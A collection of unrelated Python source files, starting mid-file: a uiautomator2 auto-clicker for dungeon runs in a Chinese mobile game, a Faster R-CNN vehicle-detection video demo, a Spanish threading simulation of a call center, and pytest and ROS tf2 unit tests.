print('连接模拟器')
self.device = u2.connect('127.0.0.1:5555')
print('连接成功')
print('-------------------------------------------------------------------')
def main_event(self):
"""事件主体"""
btn1 = Button(self, text='塞北刷怪', command=lambda: MainWindow.thread_it(self.sai_bei))
btn1.place(x=20, y=100)
btn2 = Button(self, text='燕王阁3次', command=lambda: MainWindow.thread_it(self.yan_wang))
btn2.place(x=100, y=100)
btn3 = Button(self, text='枯骨门1次', command=lambda: MainWindow.thread_it(self.ku_gu))
btn3.place(x=180, y=100)
btn4 = Button(self, text='天一教1次', command=lambda: MainWindow.thread_it(self.tian_yi))
btn4.place(x=20, y=200)
btn5 = Button(self, text='铁刃门1次', command=lambda: MainWindow.thread_it(self.tie_ren))
btn5.place(x=100, y=200)
btn5 = Button(self, text='一键运行所有', command=lambda: MainWindow.thread_it(self.yi_jian))
btn5.place(x=180, y=200)
def sai_bei(self):
"""塞北刷怪"""
print('泰山到塞北')
self.device.click(0.214, 0.95)
time.sleep(2)
self.device.click(0.312, 0.819)
time.sleep(2)
self.device.click(0.362, 0.12)
time.sleep(5)
self.device.click(0.224, 0.372)
time.sleep(5)
self.device.click(0.096, 0.585)
time.sleep(6)
self.device.click(0.43, 0.471)
time.sleep(6)
self.device.click(0.268, 0.634)
time.sleep(6)
self.device.click(0.432, 0.468)
time.sleep(6)
self.device.click(0.108, 0.769)
time.sleep(6)
self.device.click(0.21, 0.393)
time.sleep(6)
print('开始刷怪')
for i in range(10):
self.device.click(0.378, 0.436)
time.sleep(5)
self.device.click(0.548, 0.691)
time.sleep(5)
self.device.click(0.712, 0.347)
time.sleep(5)
self.device.click(0.38, 0.741)
time.sleep(5)
self.device.click(0.662, 0.489)
time.sleep(5)
self.device.click(0.09, 0.691)
time.sleep(5)
self.device.click(0.258, 0.209)
time.sleep(5)
print('回到泰山')
self.device.click(0.258, 0.209)
time.sleep(5)
self.device.click(0.198, 0.957)
time.sleep(3)
self.device.click(0.274, 0.804)
time.sleep(3)
self.device.click(0.742, 0.609)
time.sleep(3)
self.device.click(0.592, 0.861)
time.sleep(10)
print('刷野完成')
def yan_wang(self):
print("""泰山到幽州""")
self.device.click(0.204, 0.946)
time.sleep(2)
self.device.click(0.296, 0.822)
time.sleep(2)
self.device.click(0.58, 0.294)
time.sleep(2)
self.device.click(0.432, 0.549)
time.sleep(8)
print("""走到副本前面""")
self.device.click(0.672, 0.797)
time.sleep(5)
self.device.click(0.212, 0.776)
time.sleep(5)
self.device.click(0.658, 0.691)
time.sleep(5)
self.device.click(0.688, 0.691)
time.sleep(5)
self.device.click(0.734, 0.748)
time.sleep(5)
self.device.click(0.736, 0.755)
time.sleep(5)
self.device.click(0.552, 0.595)
time.sleep(5)
print("""第一次与士兵对话""")
self.device.click(0.924, 0.539)
time.sleep(5)
self.device.click(0.6, 0.436)
time.sleep(5)
self.device.click(0.596, 0.421)
time.sleep(5)
self.device.click(0.646, 0.439)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# -------------------------------------
print("""第二次与士兵对话""")
        self.device.click(0.544, 0.588)  # walk over
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# --------------------------------------
print("""第三次与士兵对话""")
        self.device.click(0.544, 0.588)  # walk over
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.592, 0.613)
time.sleep(2)
self.device.click(0.456, 0.861)
time.sleep(6)
print('----------------------燕王阁完成-------------------')
def ku_gu(self):
print("""从泰山到杭州""")
self.device.click(0.208, 0.943)
time.sleep(2)
self.device.click(0.302, 0.804)
time.sleep(2)
self.device.click(0.616, 0.698)
time.sleep(2)
self.device.click(0.478, 0.936)
time.sleep(8)
print("""走到副本""")
self.device.click(0.044, 0.734)
time.sleep(5)
self.device.click(0.216, 0.294)
time.sleep(5)
self.device.click(0.26, 0.326)
time.sleep(5)
self.device.click(0.444, 0.18)
time.sleep(5)
self.device.click(0.928, 0.546)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.808, 0.581)
time.sleep(5)
self.device.click(0.548, 0.18)
time.sleep(5)
self.device.click(0.214, 0.088)
time.sleep(5)
self.device.click(0.772, 0.776)
time.sleep(5)
self.device.click(0.665, 0.588)
time.sleep(5)
self.device.click(0.688, 0.287)
time.sleep(5)
self.device.click(0.712, 0.514)
time.sleep(5)
self.device.click(0.49, 0.262)
time.sleep(5)
self.device.click(0.748, 0.216)
time.sleep(5)
self.device.click(0.654, 0.588)
time.sleep(5)
self.device.click(0.596, 0.138)
time.sleep(5)
self.device.click(0.768, 0.287)
time.sleep(5)
self.device.click(0.494, 0.407)
time.sleep(8)
self.device.click(0.662, 0.258)
time.sleep(5)
self.device.click(0.152, 0.549)
time.sleep(5)
self.device.click(0.608, 0.432)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print('----------------------枯骨门完成-------------------')
def tian_yi(self):
print("""从泰山到成都""")
self.device.click(0.21, 0.96)
time.sleep(2)
self.device.click(0.296, 0.815)
time.sleep(2)
self.device.click(0.154, 0.907)
time.sleep(2)
self.device.click(0.016, 0.939)
time.sleep(8)
print("""走到副本""")
self.device.click(0.436, 0.797)
time.sleep(5)
self.device.click(0.598, 0.734)
time.sleep(5)
self.device.click(0.92, 0.535)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(8)
print("""进入副本刷怪""")
self.device.click(0.754, 0.79)
time.sleep(5)
self.device.click(0.662, 0.585)
time.sleep(5)
self.device.click(0.758, 0.776)
time.sleep(5)
self.device.click(0.716, 0.539)
time.sleep(5)
self.device.click(0.432, 0.287)
time.sleep(5)
self.device.click(0.588, 0.23)
time.sleep(5)
self.device.click(0.268, 0.241)
time.sleep(5)
self.device.click(0.208, 0.109)
time.sleep(5)
self.device.click(0.766, 0.202)
time.sleep(5)
self.device.click(0.438, 0.599)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.938, 0.251)
time.sleep(2)
self.device.click(0.794, 0.521)
time.sleep(6)
print('----------------------天一教完成-------------------')
def tie_ren(self):
print("""泰山到杭州""")
self.device.click(0.202, 0.946)
time.sleep(2)
self.device.click(0.304, 0.819)
time.sleep(2)
self.device.click(0.614, 0.698)
time.sleep(2)
self.device.click(0.476, 0.946)
time.sleep(8)
print("""走到副本""")
self.device.click(0.048, 0.726)
time.sleep(5)
self.device.click(0.214, 0.294)
time.sleep(5)
self.device.click(0.248, 0.322)
time.sleep(5)
self.device.click(0.206, 0.294)
time.sleep(5)
self.device.click(0.104, 0.581)
time.sleep(5)
self.device.click(0.146, 0.762)
time.sleep(5)
self.device.click(0.264, 0.343)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.208, 0.258)
time.sleep(5)
self.device.click(0.712, 0.248)
time.sleep(5)
self.device.click(0.72, 0.237)
time.sleep(5)
self.device.click(0.66, 0.294)
time.sleep(5)
self.device.click(0.378, 0.237)
time.sleep(5)
self.device.click(0.656, 0.496)
time.sleep(5)
self.device.click(0.656, 0.393)
time.sleep(5)
self.device.click(0.434, 0.691)
time.sleep(5)
self.device.click(0.604, 0.429)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print("-----------------铁刃门完成--------------------")
def yi_jian(self):
print("-----------一键任务开始运行--------------")
self.sai_bei()
self.yan_wang()
self.ku_gu()
self.tian_yi()
self.tie_ren()
print("-----------一键任务运行结束--------------")
@staticmethod
def thread_it(func, *args):
"""多线程防止阻塞"""
t = threading.Thread(target=func, args=args)
t.setDaemon(True) # 守护
t.start() # 启动
if __name__ == '__main__':
app = MainWindow()
app.mainloop()
|
hcar_v.py
|
#! /usr/bin/env python
from __future__ import print_function
import argparse
import os
import cv2
import cv2.cv as cv
import time
import Queue
import thread
from threading import Thread
from skvideo.io import VideoWriter
import mxnet as mx
import numpy as np
from rcnn.config import config
from rcnn.symbol import get_vggm_test, get_vggm_rpn_test
from rcnn.symbol import get_vgg_test, get_vgg_rpn_test
from rcnn.io.image import resize, transform
from rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection
from rcnn.utils.load_model import load_param
from rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper
CLASSES = ('__background__',
'car', 'coach','truck','person','tanker')
config.TEST.HAS_RPN = True
SHORT_SIDE = config.SCALES[0][0]
LONG_SIDE = config.SCALES[0][1]
PIXEL_MEANS = config.PIXEL_MEANS
DATA_NAMES = ['data', 'im_info']
LABEL_NAMES = None
DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]
LABEL_SHAPES = None
# visualization
CONF_THRESH = 0.8
NMS_THRESH = 0.3
nms = py_nms_wrapper(NMS_THRESH)
def get_net(symbol, prefix, epoch, ctx):
arg_params, aux_params = load_param(prefix, epoch, convert=True, ctx=ctx, process=True)
# infer shape
data_shape_dict = dict(DATA_SHAPES)
arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()
arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)
arg_shape_dict = dict(zip(arg_names, arg_shape))
aux_shape_dict = dict(zip(aux_names, aux_shape))
# check shapes
for k in symbol.list_arguments():
if k in data_shape_dict or 'label' in k:
continue
assert k in arg_params, k + ' not initialized'
assert arg_params[k].shape == arg_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(arg_shape_dict[k]) + ' provided ' + str(arg_params[k].shape)
for k in symbol.list_auxiliary_states():
assert k in aux_params, k + ' not initialized'
assert aux_params[k].shape == aux_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(aux_shape_dict[k]) + ' provided ' + str(aux_params[k].shape)
predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,
provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,
arg_params=arg_params, aux_params=aux_params)
return predictor
def generate_batch(im):
"""
preprocess image, return batch
:param im: cv2.imread returns [height, width, channel] in BGR
:return:
data_batch: MXNet input batch
data_names: names in data_batch
im_scale: float number
"""
im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)
im_array = transform(im_array, PIXEL_MEANS)
im_info = np.array([[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)
data = [mx.nd.array(im_array), mx.nd.array(im_info)]
data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]
data_batch = mx.io.DataBatch(data=data, label=None, provide_data=data_shapes, provide_label=None)
return data_batch, DATA_NAMES, im_scale
def demo_net(predictor, image_name, args):
"""
generate data_batch -> im_detect -> post process
:param predictor: Predictor
:param image_name: image name
:param vis: will save as a new image if not visualized
:return: None
"""
assert os.path.exists(image_name), image_name + ' not found'
im = cv2.imread(image_name)
data_batch, data_names, im_scale = generate_batch(im)
#for i in range(10):
# scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
t0 = time.clock()
for i in range(1):
scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
print(time.clock() - t0)
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
# print results
print('class ---- [[x1, x2, y1, y2, confidence]]')
for ind, boxes in enumerate(boxes_this_image):
if len(boxes) > 0:
print('---------', CLASSES[ind], '---------')
print(boxes)
if args.vis:
vis_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
else:
#print(os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1]))
result_file = os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1])
print('results saved to %s' % result_file)
im = draw_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
cv2.imwrite(result_file, im)
def parse_args():
parser = argparse.ArgumentParser(description='Demonstrate a Faster R-CNN network')
parser.add_argument('--prefix', help='saved model prefix', type=str)
parser.add_argument('--epoch', help='epoch of pretrained model', type=int)
parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)
parser.add_argument('--network', help='network to use', default='vgg', type=str)
parser.add_argument('--in_video', help='input video', type=str)
parser.add_argument('--out', help='output video', type=str)
args = parser.parse_args()
return args
def read_video(args, queue):
cap = cv2.VideoCapture(args.in_video)
while True:
ret, im = cap.read()
        if not ret:  # end of stream or read error: signal downstream and stop
print('read_video finish...')
queue.put(None)
cap.release()
break
data_batch, data_names, im_scale = generate_batch(im)
queue.put([im, data_batch, data_names, im_scale])
print('Hello1')
def detect(pred, args, im_queue, rst_queue):
while True:
im_item = im_queue.get()
if not im_item:
print('detect finish...')
rst_queue.put(None)
break
im, data_batch, data_names, im_scale = im_item
t0 = time.clock()
scores, boxes, data_dict = im_detect(pred, data_batch, data_names, im_scale)
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
print('detect:', time.clock() - t0)
        rst_queue.put([data_dict['data'].asnumpy(), boxes_this_image, im_scale])
print('Hello2')
def draw(args, queue):
#cap = cv2.VideoCapture(args.in_video)
#cat = cv2.VideoWriter(args.out, fourcc=cv.CV_FOURCC(*"MJPG"), fps=cap.get(cv.CV_CAP_PROP_FPS), frameSize=(int(cap.get(cv.CV_CAP_PROP_FRAME_WIDTH)), int(cap.get(cv.CV_CAP_PROP_FRAME_HEIGHT))), isColor=True)
#cap.release()
while True:
item = queue.get()
if not item:
print('draw finish...')
break
data_dict, boxes_this_image, im_scale = item
im = draw_all_detection(data_dict, boxes_this_image, CLASSES, im_scale)
print('write: ', time.clock())
#cat.write(im)
#cat.release()
print('Hello3')
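# Pipeline sketch: main() below wires three worker threads together through two
# single-slot queues,
#   read_video -> im_queue -> detect -> rst_queue -> draw
# and a None sentinel is pushed through each queue to signal end-of-stream.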
def main():
print(cv2.__version__)
args = parse_args()
ctx = mx.gpu(args.gpu)
symbol = eval('get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
predictor = get_net(symbol, args.prefix, args.epoch, ctx)
im_queue = Queue.Queue(maxsize=1)
rst_queue = Queue.Queue(maxsize=1)
threads = []
threads.append(Thread(target=read_video, args=(args, im_queue)))
threads.append(Thread(target=detect, args=(predictor, args, im_queue, rst_queue)))
threads.append(Thread(target=draw, args=(args, rst_queue)))
for t in threads: t.start()
for t in threads: t.join()
print('Finish')
if __name__ == '__main__':
main()
|
Proyecto1_CentrodeLlamadas.py
|
# @author: Carlos Mendoza
# Problem: HELP telephone call center
# An average of 10 telephones in use per hour is assumed,
# so there are 10 telephones available.
# Uses the threading library for thread handling, random for randomness,
# and time for timing.
from threading import Barrier,Thread,Semaphore
import random
import time
# Intake function where the threads (calls) enter and are tracked,
# as well as how often the available telephones are checked.
def ingresos(num):
    global mut_ingreso, telefonos, llamadasEntrante  # Global variables used in this function
while True:
llamadasEntrante.acquire()
mut_ingreso.acquire()
print(" Sonando el telefono, Rinrinrin")
time.sleep(3)
print("Llegando la llamada")
time.sleep(3)
mut_ingreso.release()
mut_ingreso.acquire()
print("Atendiendo una llamada en el telefono num.",num)
telefonos.append(1)
time.sleep(5)
mut_ingreso.release()
#llamadasEntrante.release()
mut_ingreso.acquire()
print("Los telefonos ocupados")
time.sleep(10)
mut_ingreso.release()
mut_ingreso.acquire()
print("Se tienen atendiendo ",max_ingreso.n_waiting+1, "llamadas en este momento")#NOs da el numero de hilos
print("Telefonos ocupados son",len(telefonos))
time.sleep(5)
mut_ingreso.release()
llamadasEntrante.release()
        max_ingreso.wait()  # Barrier that waits for 10 threads, the limit taken into account
if len(telefonos)==10:
mut_ingreso.acquire()
print("Llamadas en espera, se espera terminar la llamada en los telefonos")
time.sleep(3)
del telefonos[:]
print("Por ahora no tenemos llamadas",telefonos, "se liberon los telefonos ")
time.sleep(3)
mut_ingreso.release()
# Function in which a service is requested or the call keeps being handled,
# depending on the incoming threads.
def egreso(num):
global mut_egreso,ayuda,mut_ingreso
while True:
mut_ingreso.acquire()
        if ayuda==random.randint(3,7):  # Random chance of requesting an emergency service
#mut_ingreso.acquire()
mut_egreso.acquire()
print("Llamando a" ,str(random.choice(servicios)))
print("Va en camino, a rescate")
time.sleep(3)
mut_egreso.release()
llamadasEntrante.release()
mut_ingreso.release()
mut_egreso.acquire()
print(" Se sigue atendiendo la llamada entrante ")
time.sleep(random.randint(4,7))
mut_egreso.release()
llamadasEntrante.acquire()
# Main thread that launches the call threads for intake and egress,
# and reports the availability of the telephones.
def main():
    global llamadasEntrante, mut_ocupa  # Global variables used in this function
while True:
#mut_ingreso.acquire()
        telefonosDisp=10-len(telefonos)
        print("Los telefonos disponibles son ",telefonosDisp)
        print("Telefonos ", telefonos, "ocupados ", len(telefonos))  # Each 1 marks a telephone currently in use
mut_ocupa.release()
nuevoIngt.release()
llamadasEntrante.release()
print("Esperando llamada")
time.sleep(5)
parametros=random.randint(11, 15)
for num_llamadas in range(1,parametros):
Thread(target=ingresos,args=[num_llamadas]).start()
for num_Egreso in range(1,parametros):
Thread(target=egreso,args=[num_Egreso]).start()
# Variables used throughout the program.
# `ayuda` is the defined probability threshold for calling the emergency services.
ayuda=5
# Semaphores and mutexes assigned to the threads to keep the program flowing.
mut_ocupa=Semaphore(1)
llamadasEntrante=Semaphore(0)
nuevoIngt=Semaphore(0)
mut_egreso=Semaphore(1)
mut_ingreso=Semaphore(1)
# Barrier that holds 10 threads, the limit considered for the call center.
max_ingreso=Barrier(10)
# List of services that are provided.
servicios=["Policias","Bomberos","Ambulancia"]
# List that tracks the availability and use of the telephones.
telefonos=[]
Thread(target=main,args=[]).start()
|
test_config_cli.py
|
import time
from multiprocessing import Process
import pytest
from click.testing import CliRunner
from panoptes.utils.config.cli import config_server_cli
@pytest.fixture(scope='module')
def runner():
return CliRunner()
@pytest.fixture(scope='module')
def cli_config_port():
return 12345
@pytest.mark.skip("Not working")
def test_cli_server(runner, config_path, cli_config_port):
def run_cli():
result = runner.invoke(config_server_cli,
[
'--verbose',
'run',
'--config-file', f'{config_path}',
'--port', cli_config_port,
'--no-save-local',
'--no-load-local'
])
assert result.exit_code == 0
proc = Process(target=run_cli)
proc.start()
assert proc.pid
    # Let the server start.
time.sleep(5)
result = runner.invoke(config_server_cli, ['--verbose', '--port', f'{cli_config_port}', 'get', f'name', ])
assert result.exit_code == 0
# Ugh. I hate this. Logger is interfering in annoying ways.
assert result.stdout.endswith("Testing PANOPTES Unit\n")
proc.terminate()
proc.join(30)
@pytest.mark.skip("Not working")
def test_config_server_cli(runner, cli_server, cli_config_port):
result = runner.invoke(config_server_cli, ['--verbose', '--port', f'{cli_config_port}', 'get', f'name'])
assert result.exit_code == 0
# Ugh. I hate this. Logger is interfering in annoying ways.
assert result.stdout.endswith("Testing PANOPTES Unit\n")
# Set the name.
result = runner.invoke(config_server_cli, ['--port', f'{cli_config_port}', 'set', f'name', f'foobar'])
assert result.exit_code == 0
assert result.stdout.endswith("\n{'name': 'foobar'}\n")
# Get the name.
result = runner.invoke(config_server_cli, ['--port', f'{cli_config_port}', 'get', f'name'])
assert result.exit_code == 0
assert result.stdout.endswith("\nfoobar\n")
|
test_buffer_client.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import unittest
import rclpy
import threading
from tf2_ros.buffer_client import BufferClient
from geometry_msgs.msg import TransformStamped
from tf2_msgs.action import LookupTransform
from tf2_py import BufferCore, TransformException, TimeoutException, \
LookupException, InvalidArgumentException, ExtrapolationException, ConnectivityException
from rclpy.executors import SingleThreadedExecutor
from tf2_msgs.msg import TF2Error
def build_transform(target_frame, source_frame, stamp):
transform = TransformStamped()
transform.header.frame_id = target_frame
transform.header.stamp = stamp
transform.child_frame_id = source_frame
transform.transform.translation.x = 42.0
transform.transform.translation.y = -3.14
transform.transform.translation.z = 0.0
transform.transform.rotation.w = 1.0
transform.transform.rotation.x = 0.0
transform.transform.rotation.y = 0.0
transform.transform.rotation.z = 0.0
return transform
class MockActionServer():
def __init__(self, node, buffer_core):
self.goal_srv = node.create_service(
LookupTransform.Impl.SendGoalService, '/lookup_transform/_action/send_goal',
self.goal_callback)
self.cancel_srv = node.create_service(
LookupTransform.Impl.CancelGoalService, '/lookup_transform/_action/cancel_goal',
self.cancel_callback)
self.result_srv = node.create_service(
LookupTransform.Impl.GetResultService, '/lookup_transform/_action/get_result',
self.result_callback)
self.feedback_pub = node.create_publisher(
LookupTransform.Impl.FeedbackMessage, '/lookup_transform/_action/feedback', 1)
self.node = node
self.buffer_core = buffer_core
self.result_buffer = {}
def goal_callback(self, request, response):
response.accepted = True
bytes_goal_id = bytes(request.goal_id.uuid)
try:
if not request.goal.advanced:
transform = self.buffer_core.lookup_transform_core(target_frame=request.goal.target_frame,
source_frame=request.goal.source_frame,
time=request.goal.source_time)
self.result_buffer[bytes_goal_id] = (
transform, TF2Error.NO_ERROR, '')
else:
transform = self.buffer_core.lookup_transform_full_core(
target_frame=request.goal.target_frame,
source_frame=request.goal.source_frame,
source_time=request.goal.source_time,
target_time=request.goal.target_time,
fixed_frame=request.goal.fixed_frame
)
self.result_buffer[bytes_goal_id] = (
transform, TF2Error.NO_ERROR, ''
)
except TimeoutException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.TIMEOUT_ERROR, e)
except LookupException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.LOOKUP_ERROR, e)
except InvalidArgumentException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.INVALID_ARGUMENT_ERROR, e)
except ExtrapolationException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.EXTRAPOLATION_ERROR, e)
except ConnectivityException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.CONNECTIVITY_ERROR, e)
except TransformException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.TRANSFORM_ERROR, e)
return response
def cancel_callback(self, request, response):
response.goals_canceling.append(request.goal_info)
return response
def result_callback(self, request, response):
bytes_goal_id = bytes(request.goal_id.uuid)
response.result.transform = self.result_buffer[bytes_goal_id][0]
response.result.error = TF2Error(
error=self.result_buffer[bytes_goal_id][1],
error_string=str(self.result_buffer[bytes_goal_id][2]))
return response
def publish_feedback(self, goal_id):
feedback_message = LookupTransform.Impl.FeedbackMessage()
feedback_message.goal_id = goal_id
self.feedback_pub.publish(feedback_message)
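# The MockActionServer above stands in for the real lookup_transform action server: it
# implements the three underlying services (send_goal / cancel_goal / get_result) plus the
# feedback topic directly, so BufferClient can be tested against a plain BufferCore without
# spinning up a full action server.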
class TestBufferClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.context = rclpy.context.Context()
rclpy.init(context=cls.context)
cls.executor = SingleThreadedExecutor(context=cls.context)
cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
cls.executor.add_node(cls.node)
buffer_core = BufferCore()
transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
buffer_core.set_transform(transform, 'unittest')
cls.mock_action_server = MockActionServer(cls.node, buffer_core)
@classmethod
def tearDownClass(cls):
cls.node.destroy_node()
rclpy.shutdown(context=cls.context)
def setUp(self):
self.spinning = threading.Event()
